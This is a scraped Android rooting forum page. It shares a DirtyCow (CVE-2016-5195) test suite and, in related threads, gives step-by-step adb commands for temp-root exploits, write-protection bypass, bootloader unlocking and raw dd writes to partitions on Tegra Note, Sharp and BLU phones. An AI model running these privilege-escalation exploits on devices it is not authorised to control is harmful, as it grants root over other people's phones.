Hi guys,
i made a small test suite to test vulnerability to CVE-2016-5195 on Linux-based systems.
This is 99.9% the work of the author of the exploit, i just made some minor changes to transform this into a test suite.
Download: DirtyCow Test-Suite
Important: Activate USB-Debugging to get adb-shell running!
How-to-test:
Code:
Download the test suite from above server
Unpack the .zip
Attach your device via USB to your PC
./testvuln.sh
If vulnerable, you should see this:
Code:
202 KB/s (10000 bytes in 0.048s)
131 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
UID=0(root), your device is vulnerable!
Otherwise if not vulnerable something like this:
Code:
140 KB/s (10000 bytes in 0.069s)
133 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]
Source (You can build it yourself via ndk):
https://www.androidfilehost.com/?fid=457095661767106997
Hint: Should work on all ARMv8 devices!
As I understand this would give a root adb shell and therefore I could root my Z5 Compact and install supersu? I only want to remove some garbage apps without unlocking the Boatloader.
tavoc said:
As I understand this would give a root adb shell and therefore I could root my Z5 Compact and install supersu? I only want to remove some garbage apps without unlocking the Boatloader.
Click to expand...
Click to collapse
This elevates privileges of a process. If you want a root shell you must do some modifications to the code, but this can potentially root all DirtyCow affected devices.
Thanks, I will have a look at your code. Maybe a github account would be nice for Pull request etc.
tavoc said:
Thanks, I will have a look at your code. Maybe a github account would be nice for Pull request etc.
Click to expand...
Click to collapse
Best thing you can do is fork this, i made some changes which contradict your desire of a root tool.
So this script is not working under Windows, ist that right?
So we can get root shell? but I don't think we can change the system partition without kernel changing right?
Or we can?
My question is can we root the device with this method?
DannyWilde said:
So this script is not working under Windows, ist that right?
Click to expand...
Click to collapse
For windows,download adb tools, copy all binary to adb folder and enter following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
sijav said:
So we can get root shell? but I don't think we can change the system partition without kernel changing right?
Or we can?
My question is can we root the device with this method?
Click to expand...
Click to collapse
1. Yes
2. Yes
3. Yes, potentially
Tommy-Geenexus said:
For windows,download adb tools, copy all binary to adb folder and enter following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
Click to expand...
Click to collapse
on
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
i get "not found"
on
adb shell /system/bin/run-as
i get "run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]"
run-as process has only 2 capabilities(setuid/setgid), also with selinux restriction, it cannot exec any shell even get elevated privilege ...
super_apache said:
run-as process has only 2 capabilities(setuid/setgid), also with selinux restriction, it cannot exec any shell even get elevated privilege ...
Click to expand...
Click to collapse
I know. This is not a root tool, this is just to test vulnerability.
Edit: Not sure if this was directed at me or the guy asking the root q, anyway this answers the root q.
Would be nice to have a working root exploit for Marshmallow. Keep us updated please'
To those asking about root (SuperSu) you must remember that with a locked bootloader you can't edit kernel or system partition.
As said elsewhere, there s no way to "root" without unlocking bl
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please'
To those asking about root (SuperSu) you must remember that with a locked bootloader you can't edit kernel or system partition.
As said elsewhere, there s no way to "root" without unlocking bl
Click to expand...
Click to collapse
This is the wrong thread then. I definitly do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please'
To those asking about root (SuperSu) you must remember that with a locked bootloader you can't edit kernel or system partition.
As said elsewhere, there s no way to "root" without unlocking bl
Click to expand...
Click to collapse
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
Tommy-Geenexus said:
This is the wrong thread then. I definitly do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
Click to expand...
Click to collapse
Sorry i misunderstood too. I thought you was planning to use it practically to create an exploit for MM.
I don't think it's necessary as we already have an exploit for LP, though it would be nice.
YuriRM said:
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
Click to expand...
Click to collapse
"WARNING UNLOCKING YOUR BOOTLOADER WILL WIPE DATA AND FACTORY RESET THE DEVICE"
they unlock the bootloader using fastboot command
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
wessok said:
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
Click to expand...
Click to collapse
Googleing for hours and didn't understand a simple sentence (in my post above) or the technical reasons behind that (in many threads) ? Stop your search now, unlock it and live happily.
Related
Discovering "adb shell" gave joy, experiencing the shell as minimal bash with awful line handling (backspace and command recall) gave annoyance, experiencing "adb root" refusing access gave frustration.
After some tracking, it turns out that adbd behaviour is determined by the property "ro.debuggable" which is set during system init. The initial value is located in the file "/default.prop". In JP6 it is set to 0 resulting is adbd refusing access. However, set to 1, "adbd root" will give the much better response of "restarting adbd as root".
Once set, the property value cannot be changed. To get this fixed you need to change the contents of the file default.prop which is located in the initial ramdisk image.
Optionally, you can put a replacement shell in /sbin of in ramdisk image so that when connected "exec bash" will make things more relaxing. I attached the version I am using, which is statically linked with ncurses/readline.
There is also a simple patch to unlock adbd if you dislike opening and rebuilding the ramdisk image. However, you do need binoffset which is located in the scripts directory of the linux source tree.
Code:
ofs=`scripts/binoffset initramfs.cpio \`echo -n 'debuggable=0' | od -t u1 -An\` 2>/dev/null`
echo 'debuggable=1' | dd bs=1 seek=$ofs conv=notrunc of=initramfs.cpio
Thanks...any help though?
Hi....thanks for the fix....could you point me to a decent howto on editting the initial ramdisk?
Thanks
M
it doesn't sound simple
i will try to figure that one out ...
Dear Hexabit,
I know it's an old topic.
But do you know how can I use this Fix on a windows 7?
tried searching for binoffset software/script..couldn't find anything
I have a Flytouch 3 tablet, rooted(Z4) with terminal emulator and root explorer.
is there a way to use you bash.rar to unlock adb access?
thanks for the help
doekoe87 said:
Dear Hexabit,
I know it's an old topic.
But do you know how can I use this Fix on a windows 7?
tried searching for binoffset software/script..couldn't find anything
I have a Flytouch 3 tablet, rooted(Z4) with terminal emulator and root explorer.
is there a way to use you bash.rar to unlock adb access?
thanks for the help
Click to expand...
Click to collapse
you have to split the kernel, then decompile the ramdisk and edit default.prop and change ro.debuggable to 1, then recompile and flash
confuse but giving me a clue
I use unpackbootimg in my ubuntu pc.
The adb root works not properly after set debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with a unlocked one. It works!
Thanks for your help.
I am sorry but I don't understand how to use the file.
teoking said:
I use unpackbootimg in my ubuntu pc.
The adb root works not properly after set debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with a unlocked one. It works!
Thanks for your help.
Click to expand...
Click to collapse
Hi,
I can upload nothing to my root catalog of my phone.
So how could I use the adbd file in this case?
Phone is rooted but I have a problem with adb root command like subject of this topic is.
Can u help me with the process because I kept the file in /sbin but still it's not working.
Active system
Sent from my SM-G900T3 using Tapatalk
EDIT:
Go here to root your Tegra Note 7: https://github.com/linux-shield/shield-root/blob/master/README.md (thanks to CampGareth for finding the link).
I have tested this, it works with no bloatware, only installs SuperSu.
---------
Hey guys, I got my new Tegra Note 7 last night and I've been trying to get it rooted, but I keep running into trouble.
First of all, I DO NOT want to use some shady Chinese software that installs a bunch of bloat on both my tablet and PC just to get SuperSu going, I've tried that method and had to reset the tablet to get rid of all the crap it installs (and it didn't even seem to root anyway).
Now I'm trying the manual method from here: http://pan.baidu.com/wap/link?uk=3073396937&shareid=3129426036&third=0
Which, again, is Chinese but at least I can see what it's doing since I'm issuing ADB commands, and supposedly it has worked for others on this forum.
Now, I get to step 3 on the included PDF which says to boot an insecure bootloader image with "fastboot boot tegranote_insecure_boot.img", I do this and the tablet screen flashes a few times and reboots to android.
I get to the next step which says to open an adb shell, and do "/sbin/rootsh +p" to get a temp root shell, and this is where I get stuck. Instead of getting a root shell I get the message "/system/bin/sh: /sbin/rootsh: not found". Does anyone have suggestions?
By the way we really need a Tegra Note 7 subforum here at XDA, if the mods could add it that would be great.
dark42 said:
Hey guys, I got my new Tegra Note 7 last night and I've been trying to get it rooted, but I keep running into trouble.
First of all, I DO NOT want to use some shady Chinese software that installs a bunch of bloat on both my tablet and PC just to get SuperSu going, I've tried that method and had to reset the tablet to get rid of all the crap it installs (and it didn't even seem to root anyway).
Now I'm trying the manual method from here: http://pan.baidu.com/wap/link?uk=3073396937&shareid=3129426036&third=0
Which, again, is Chinese but at least I can see what it's doing since I'm issuing ADB commands, and supposedly it has worked for others on this forum.
Now, I get to step 3 on the included PDF which says to boot an insecure bootloader image with "fastboot boot tegranote_insecure_boot.img", I do this and the tablet screen flashes a few times and reboots to android.
I get to the next step which says to open an adb shell, and do "/sbin/rootsh +p" to get a temp root shell, and this is where I get stuck. Instead of getting a root shell I get the message "/system/bin/sh: /sbin/rootsh: not found". Does anyone have suggestions?
By the way we really need a Tegra Note 7 subforum here at XDA, if the mods could add it that would be great.
Click to expand...
Click to collapse
I would recommend the following procedure:
1. Download the root_tool_v2.zip attached to this post
2. Unzip the contents the root_tool_v2.zip to a directory
3. Run the following commands from your ADB and Fastboot directory:
Code:
adb reboot bootloader
fastboot boot tegranote_insecure_v2.img
4. Once your device finishes booting the insecure boot.img (Your device's screen will blink several times and then boot into Android) run the following commands:
Code:
adb shell
mount -o remount,rw /dev/block/mmcblk0p5 /system
exit
adb push su /system/xbin/su
adb push Superuser.apk /system/app/Superuser.apk
adb shell
chmod 6755 /system/xbin/su
chmod 644 /system/app/Superuser.apk
mount -o remount,ro /dev/block/mmcblk0p5 /system
exit
adb reboot
5. You should now have Superuser installed and have root access.
What I did was I modified the boot.img provided to be insecure and use an insecure adbd binary to allow a root shell when booted from which can then be used to setup Superuser and su binary access. Let me know how this goes for you and if you have any questions .
Wow, thanks for the help! Unfortunately your attachment seems to be corrupt, I can't decompress the archive. I'm using 7-zip btw. The forum says your attachment is 7.19MB but when downloaded it's only 160KB.
If you can re-upload it I will give it a go.
a reup of the file would be much appreciated! :good:
PS
i have a batch file to expedite the process.
dark42 said:
Wow, thanks for the help! Unfortunately your attachment seems to be corrupt, I can't decompress the archive. I'm using 7-zip btw. The forum says your attachment is 7.19MB but when downloaded it's only 160KB.
If you can re-upload it I will give it a go.
Click to expand...
Click to collapse
dergezero said:
a reup of the file would be much appreciated! :good:
PS
i have a batch file to expedite the process.
Click to expand...
Click to collapse
Re-uploaded the file for you guys let me know how it goes for you .
Awesome your new package downloaded fine.
However I'm still not getting root, I got to step 4 and when I open an adb shell I don't have permissions to do the next command.
The exact error message:
[email protected]:/ mount -o remount,rw /dev/block/mmcblk0p5 /system
mount -o remount,rw /dev/block/mmcblk0p5 /system
mount: Operation not permitted
So I guess the insecure boot image didn't work right. I should mention that I am using the latest Tegra Note firmware, I don't know if that makes a difference though. Any ideas?
Thanks for your help so far.
do you guys have a copy of the drivers for the tablet? mine only seems to work for storage.
update: got drivers working.
dergezero said:
do you guys have a copy of the drivers for the tablet? mine only seems to work for storage.
update: got drivers working.
Click to expand...
Click to collapse
I used Universal Naked Driver 0.73, I just manually installed the driver for the Nvidia Shield, thinking it would work, and it does!
Does shimp208's root image work for you, dergezero?
dark42 said:
I used Universal Naked Driver 0.73, I just manually installed the driver for the Nvidia Shield, thinking it would work, and it does!
Does shimp208's root image work for you, dergezero?
Click to expand...
Click to collapse
no, it just reboots. neither is working. im going to see if any one can give us a dump of their img that already works to be rooted. i tried that Chinese method and its really annoying and i dont get root on any computer i try it on.
Hey guys I am in the process of creating a new boot image that uses a different method for gaining root access and will upload that once I finish it.
shimp208 said:
Hey guys I am in the process of creating a new boot image that uses a different method for gaining root access and will upload that once I finish it.
Click to expand...
Click to collapse
:good: Awesome man, good luck! Eager to try it when you post it! :fingers-crossed:
dark42 said:
:good: Awesome man, good luck! Eager to try it when you post it! :fingers-crossed:
Click to expand...
Click to collapse
I agree, with the amount of malware that is in the chinese root tools, it makes me nervous to use the one the OP posted.
Brew
I wonder if someone would be able to port Clockworkmod Recovery to the TN7 eventually. The bootloader on this device is factory unlocked so it should be simple enough. Unfortunately I'm not a good enough programmer to get this done.
If we had Clockworkmod then rooting would be as easy as flashing the SuperSU .zip from the SD.
I have updated my original post with the rooting instructions to include a new insecure boot method follow the same instructions as before just use the new boot.img I uploaded to that post. Credit to teknoraver for the insecure adbd binary.
shimp208 said:
I have updated my original post with the rooting instructions to include a new insecure boot method follow the same instructions as before just use the new boot.img I uploaded to that post. Credit to teknoraver for the insecure adbd binary.
Click to expand...
Click to collapse
I tried your V2 image, still getting permission errors when doing "mount -o remount,rw /dev/block/mmcblk0p5 /system", what am I doing wrong?
dark42 said:
I tried your V2 image, still getting permission errors when doing "mount -o remount,rw /dev/block/mmcblk0p5 /system", what am I doing wrong?
Click to expand...
Click to collapse
When you boot the image and then type ADB shell do you get a root shell ([email protected]:/ #) or just a regular shell ([email protected]:/ $)?
Amazing
Nice to see you working on a different method of root... I am sorry to those who feel that the method I posted is getting negative reviews just wanted to throw something out there for people... however, I do feel much better with Shrimp208 working on a better root method I really wish we could get a forum going..
I used the Chinese root tool and all seems fine on my Tegra note
Sent from my TegraNote-P1640 using Tapatalk
shimp208 said:
When you boot the image and then type ADB shell do you get a root shell ([email protected]:/ #) or just a regular shell ([email protected]:/ $)?
Click to expand...
Click to collapse
Just a regular shell with $. Doesn't look like I get temp root permissions after running the tegranote_insecure_v2.img.
If it matters, I'm on the latest Stock ROM (4.2.2/JDQ39.13155_268.1942) and I'm using Universal Naked Driver 0.73 for the Shield, which works with this device. Maybe I need to use a different driver?
Toyeboy said:
I used the Chinese root tool and all seems fine on my Tegra note
Sent from my TegraNote-P1640 using Tapatalk
Click to expand...
Click to collapse
yeah it works but you dont really know what was installed on ur phone or on your pc. 3 apps are installed on your phone and a few reg changes on ur pc can be detrimental. and its all bloatware
im curious if there is any way to push "su" to the the system?
i mean cmon there are pleanty of KITKAT 4.4.2 fastboot files.
i have tried pushing "su" maually with "pwn" exploit.
tried with following exploits
-psneuter
-pwn
but no luck there.
any one pleaseeeee...im dieing here..
our system details.
- LOCKED BOOTLOADER ( )
- KIT KAT 4.4.2
- Blur_Version.183.46.10.XT907.Verizon.en.US ( KDA20.62-10.1 )
what i tried is
Code:
adb devices
adb push pwn /data/local/tmp
adb shell
$ cd /data/local/tmp
$ chmod 777 pwn
$ ./pwn
( NO LUCK GETTING PERMISSION AFTER $ ./pwn )
At this point, the exploit will run and close the shell. You will need to run these commands to restart the ADB server.
adb kill-server
adb devices
Now comes the moment of truth. Use the
adb shell
command to open a shell. If you see a "#" sign, you have root access, so go ahead and continue to the next part.
If not, you can go back and try the previous steps again
We now need to make this root permanent. From the root shell you just opened, type the following commands.
# mount -o remount,rw -t rfs /dev/block/st19 /system
# exit
adb push busybox /system/bin
adb push su /system/bin
adb install Superuser.apk
adb shell
# chmod 4755 /system/bin/busybox
# chmod 4755 /system/bin/su
# mount -o remount,ro -t rfs /dev/block/st19 /system
# exit
adb reboot
gys lets make this happen any how.....lets roll...
even this wont work
http://www.kingoapp.com/
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
GnatGoSplat said:
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
Click to expand...
Click to collapse
Every exploit has two sides to it: it can be used more or less legitimately by users to obtain root privileges, but it can be also abused by rogue apps to gain control over someone else's device.
When you find an exploit, the sooner you publish it, the sooner it will be patched in a firmware update, making it unusable any more for gaining root privileges. And since you've published it, the bad guys can make their use of it as well.
Patching existing vulnerabilities by companies is natural and essentially made in favour of user's safety.
The specific timing of releasing details about some found vulnerability can be part of a tactic - you can give users a window for gaining root just after a specific expected firmware release for some device. If an exploit is published too soon, it will be patched in an upcoming firmware update and no one will be able to use it for rooting...
means that there is a possible way of course but the thing is will it could be found by or not......
of course for good reasons.......
So I'll update randomly...
boot.img and recovery.img -> https://drive.google.com/file/d/0B5QYBzdG6RuyZy1TSHc2VDVhY2M/view?usp=sharing
temp root:
Code:
adb push root /data/local/tmp
adb push wpoff /data/local/tmp
adb push fbunlock /data/local/tmp
adb push recovery.img /data/local/tmp
adb push boot.img /data/local/tmp
adb shell
$ [COLOR="Red"]chmod 755 /data/local/tmp/root[/COLOR]
$ [COLOR="Red"]chmod 755 /data/local/tmp/wpoff[/COLOR]
$ [COLOR="Red"]chmod 755 /data/local/tmp/fbunlock[/COLOR]
$ /data/local/tmp/root
...
#
defeat WP:
Code:
# /data/local/tmp/wpoff --unprotect-all
check WP status(optional):
Code:
# /data/local/tmp/wpoff --dump
If you see it's all zeroes there it means good, or if there are many 5555 it means NG.
unlock bootloader:
Code:
# /data/local/tmp/fbunlock
install TWRP and patched boot:
Code:
# dd if=/data/local/tmp/recovery.img of=/dev/block/platform/msm_sdcc.1/by-name/recovery
# dd if=/data/local/tmp/boot.img of=/dev/block/platform/msm_sdcc.1/by-name/boot
install SuperSU:
Code:
FLASH SUPERSU LIKE OLD DAYS
Why patch boot?
Cos MIYABI stops ptrace, some apps depends on it won't work properly.
Chinese here:
禁止转载到国内论坛,禁止用于商业用途。日版不会有的。
Note:
a. Remember to rename recovery.00X.zip to recovery.zip.00X before unzipping!
b. If you don't flash boot.img before install SuperSU, you will end up in boot loop. To restore, delete /system/xbin/daemonsu.
Attachments will be uploaded soon.
Hi tewilove, many thanks for publishing this. Amazing work! And a big time saver
tewilove tnx allot !!
hey some one know how can i put su inside in system and then to use SuperSU ?
thank you a lot
thanks but i can not use root app and super su can not install bin su
thank you for your help
tewilove said:
Tested with a 306SH with SW version S4081.
How to:
https://youtu.be/UJs7ruckGgc
This is v1, since the shell code has to be improved yet(WIP).
It only obtains temp root with kernel context. The left things are changing to init context, disable mmc_protect_part, disable miyabi LSM.
There might be v2, which solves all above, if I have time.
And it also works with many other devices.
For example, 305SH, MI4C, SH-01G.
If it keeps crashing, it should be my hard coded offsets.
PS: Please don't reshare this thread.
PS: Chinese: 请不要转载到贴吧,论坛,谢谢。
Click to expand...
Click to collapse
thank you for your help 谢谢某因幡分享
Please I'd like to know how you did that.could you be more clear, a step by step maybe?
Sent from my D6616 using XDA Free mobile app
salmanaman said:
Please I'd like to know how you did that.could you be more clear, a step by step maybe?
Sent from my D6616 using XDA Free mobile app
Click to expand...
Click to collapse
you can watch the video that tewilove make for us .. but we need to wait when some one unlock protect bcs after you restart phone root will disappear..
tewilove said:
Tested with a 306SH with SW version S4081.
Click to expand...
Click to collapse
How can I know that I got the temporary root? Is this step in the input ID?
all step working on my 305sh like youtube video but supersu not working and root checker say me no rooted
soudara said:
all step working on my 305sh like youtube video but supersu not working and root checker say me no rooted
Click to expand...
Click to collapse
yes we know about this .. i try to remount system ( with this command : busybox mount -o remount,rw /system) to get permission but my device is restart when i try .. maybe its from this write protection that @tewilove tell us .. if he can tell us how we can install su in system if its possible for now .. ?
ok so for the moment is useless ?
soudara said:
all step working on my 305sh like youtube video but supersu not working and root checker say me no rooted
Click to expand...
Click to collapse
me too?maybe just kernel root??
---------- Post added at 12:48 PM ---------- Previous post was at 12:31 PM ----------
loonbg said:
yes we know about this .. i try to remount system ( with this command : busybox mount -o remount,rw /system) to get permission but my device is restart when i try .. maybe its from this write protection that tewilove tell us .. if he can tell us how we can install su in system if its possible for now .. ?
Click to expand...
Click to collapse
yea?rootxplore and xposed said no root?
I don't think that folks are understanding what "temp" root means. This solution allows you to achieve root for the current shell session. This does not install the additional binaries to allow other applications to use root access.
With that being said, I am wondering if we can use this temporary elevated access to correct the vulnerability outlined in CVE-2015-1474 affecting /system/lib/libui.so that Sharp has neglected to address in previous OTA updates. The only "corrected" libui.so that I have been able to locate was compiled for v5.0.1 so I am afraid that file would not be compatible with this earlier version of Android on the 306SH. I am not really savvy with in depth programming to be able to fully investigate this and develop a viable solution... anyone who would be able to point me in the right direction would receive many thanks. :banghead:
My apologies if this should have been posted in a separate thread.
awesom! it worked in my 306sh with root permission acquired in shell.
can you use root app and install super su ?
Write protection is keeping us from remounting /system as rw. This prevents us from doing anything that would have any type of impact on the current situation. I want to experiment with attempting to mount partitions with the device powered off... but my device is encrypted so I am unable to access the shell with device off until I perform a factory reset. I am planning on doing that tonight so hopefully I will be able to report back with more information soon.
Sent from my 306SH
soudara said:
can you use root app and install super su ?
Click to expand...
Click to collapse
No. We are working on it though.
On another note, I can't get this temp root to work.
Video of what happens is linked. (too large to attach)
https://mega.co.nz/#!blNTjbhS!p2ljioY_43xlWkpu3EWpj8LvfMVP5eushZT23KLPASk
TechInMD said:
Write protection is keeping us from remounting /system as rw.
Click to expand...
Click to collapse
So I assume, from the quoted text, you have tried mounting /system as rw while in the temp root shell session?
Yes. I tried using the mount command both directly from the root shell prompt plus I tried using busybox to mount also. There seem to be slight variations between them. Also, not sure if it is relevant but I attempted it both through adb and in terminal on the device. I can get to the root prompt but not further.
Sent from my 306SH
A public service announcement.
A new tool (mtk-su) by @diplomatic (link) is able to achieve a temporary yet full featured root shell on any OS version for the original BLU R1 (and most likely, on BLU R1 PLUS), see this post for proof. Use mtk-su_r11.zip, version in armv7-kernel folder, and you will get a rooted shell. To install permanent root, you will need to unlock your bootloader.
Perhaps, @mrmazak would be kind enough to update his R1 bootloader unlock tool to all OS versions It should be possible to update bootloader unlock for R1 PLUS up to the latest OS version (@lopestom), given that there is now a full featured root shell with rw system access.
bibikalka said:
A public service announcement.
A new tool (mtk-su) by @diplomatic (link) is able to achieve a temporary yet full featured root shell on any OS version for the original BLU R1 (and most likely, on BLU R1 PLUS), see this post for proof. Use mtk-su_r11.zip, version in armv7-kernel folder, and you will get a rooted shell. To install permanent root, you will need to unlock your bootloader.
Perhaps, @mrmazak would be kind enough to update his R1 bootloader unlock tool to all OS versions It might also be possible to accomplish bootloader unlock for R1 PLUS, given that there is now full featured root shell.
Click to expand...
Click to collapse
since you have your R1 powered up already, can you let me know if that temp root shell gives access to /dev/block.
as in can you test if a dd command to /dev/block is allowed. if it is then this will make a nice replacement to dirty-cow method..
mrmazak said:
since you have your R1 powered up already, can you let me know if that temp root shell gives access to /dev/block.
as in can you test if a dd command to /dev/block is allowed. if it is then this will make a nice replacement to dirty-cow method..
Click to expand...
Click to collapse
Yep, seems to work OK:
Code:
[email protected]_HD:/data/local/tmp $ ./mtk-su_arm7 -v
armv7l machine
param1: 0x1000, param2: 0x8040, type: 7
Building symbol table
...
New UID/GID: 0/0
starting /system/bin/sh
[email protected]_HD:/data/local/tmp # dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin
32768+0 records in
32768+0 records out
16777216 bytes transferred in 3.630 secs (4621822 bytes/sec)
This is way better than DirtyCow !
bibikalka said:
Yep, seems to work OK:
Code:
[email protected]_HD:/data/local/tmp $ ./mtk-su_arm7 -v
armv7l machine
param1: 0x1000, param2: 0x8040, type: 7
Building symbol table
...
New UID/GID: 0/0
starting /system/bin/sh
s[email protected]_HD:/data/local/tmp # dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin
32768+0 records in
32768+0 records out
16777216 bytes transferred in 3.630 secs (4621822 bytes/sec)
This is way better than DirtyCow !
Click to expand...
Click to collapse
that seems soo simple.
changed the dirty-cow section of the tool to use this mtk-su
and based on the read-me says, this command should work, as an all in one.
Code:
example based on file name used in tool
adb shell "/data/local/tmp/mtk-su -c dd if=/data/local/tmp/unlock of=/dev/block/mmcblk0p17"
can you test it?
Code:
adb push mtk-su /data/local/tmp/mtk-su
adb shell chmod 0777 /data/local/tmp/mtk-su
adb shell "/data/local/tmp/mtk-su -c dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin"
mrmazak said:
that seems soo simple.
changed the dirty-cow section of the tool to use this mtk-su
and based on the read-me says, this command should work, as an all in one.
Code:
example based on file name used in tool
adb shell "/data/local/tmp/mtk-su -c dd if=/data/local/tmp/unlock of=/dev/block/mmcblk0p17"
can you test it?
Code:
adb push mtk-su /data/local/tmp/mtk-su
adb shell chmod 0777 /data/local/tmp/mtk-su
adb shell "/data/local/tmp/mtk-su -c dd if=/dev/block/mmcblk0p7 of=/sdcard/p7t.bin"
Click to expand...
Click to collapse
Just tested the last bit of code, all worked properly! Ended up reading mmcblk0p7 as expected! So please proceed
bibikalka said:
Just tested the last bit of code, all worked properly! Ended up reading mmcblk0p7 as expected! So please proceed
Click to expand...
Click to collapse
I think it is ready.
Biggest unknown part is, weather it works on V9.x
We assume the only change made was the kernel patch that blocked dirty-cow. what if bootloader has unlock codes removed.
Any how I put it up on the unlock thread, And it needs a tester.
mrmazak said:
I think it is ready.
Biggest unknown part is, weather it works on V9.x
We assume the only change made was the kernel patch that blocked dirty-cow. what if bootloader has unlock codes removed.
Any how I put it up on the unlock thread, And it needs a tester.
Click to expand...
Click to collapse
Well - it's not like the bootloader is set in stone You can overwrite any /dev/block, so if there are issues, why not return all stuff - preloader & bootloaders to the V6.6 ? Then even the MTK tool would work. I don't recall there was anti-rollback protection implemented. I guess your tool tries to be the least invasive, but the full featured root gives options for a total downgrade.
bibikalka said:
Well - it's not like the bootloader is set in stone You can overwrite any /dev/block, so if there are issues, why not return all stuff - preloader & bootloaders to the V6.6 ? Then even the MTK tool would work. I don't recall there was anti-rollback protection implemented. I guess your tool tries to be the least invasive, but the full featured root gives options for a total downgrade.
Click to expand...
Click to collapse
one of the options in the tool , is to roll-back the pre-loader.
did that long ago.
didn't try with shell , only with twrp. Similar to the way the OTA changed it. and it requires you to unlock again. but it has been repeatable process.
Would this work with r1 hd from Amazon?
Hey guys, looking for little bit f help.
Actually I hardbricked by R1 plus accidentanly. Unable to find it's firmware anywhere on the internet. Xepirifirm didn't had this model in it previously. Could you please let me know where could I find it ROM and also how to boot up my phone again?